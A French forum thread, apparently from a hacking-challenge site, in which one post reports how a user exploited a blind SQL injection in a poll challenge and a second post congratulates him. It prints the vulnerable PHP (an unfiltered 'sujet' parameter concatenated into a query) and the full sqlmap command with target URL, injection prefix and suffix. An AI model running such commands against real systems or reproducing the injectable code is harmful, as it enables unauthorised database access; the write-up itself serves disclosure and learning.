Page 1 of 1

Shiney - Hack [blind SQL]

PostPosted: Wed Aug 15, 2012 10:45 pm
by Korigan
Shiney a exploité une blind injection SQL sur le challenge sondage.
Il a ainsi eu la possibilité de lire l'ensemble de la base de données.

[size=18:6deebd9820]Détails :[/size:6deebd9820]
La faille se situe dans le paramètre [b:6deebd9820]sujet[/b:6deebd9820] qui correspond au numéro du sondage que l'on souhaite noter.

[size=18:6deebd9820]Explication :[/size:6deebd9820]

Voici le code en question
[code:1:6deebd9820]$note=$_POST['valeur'];
$sujet=$_POST['sujet'];

if ($note<=10){ //si le vote n'est pas truqué
$requete="select total from sondage where id=".$sujet;
$result=mysql_query($requete);
[/code:1:6deebd9820]

Comme on peut le voir le paramètre [b:6deebd9820]sujet[/b:6deebd9820] est ajouté dans la requete SQL sans être analysé. Shiney a donc pu en prendre le contrôle sans contrainte.

[size=18:6deebd9820]Commande:[/size:6deebd9820]
[code:1:6deebd9820]./sqlmap.py -u "http://hackbbs.org/miss/5/valider.php" -p sujet --data="sujet=&valeur=1" --cookie="PHPSESSID=*COOKIE de Shiney*;name=YENIHS;" --technique=B --string=selectionner --level=2 --prefix="1 and 1=(select 1 FROM information_schema.tables WHERE 1=1" --suffix=")" --dbs[/code:1:6deebd9820]

PostPosted: Thu Aug 16, 2012 7:21 am
by KEV-1
1 seul mot : bravo.
... pour celle la et les autres ... ;)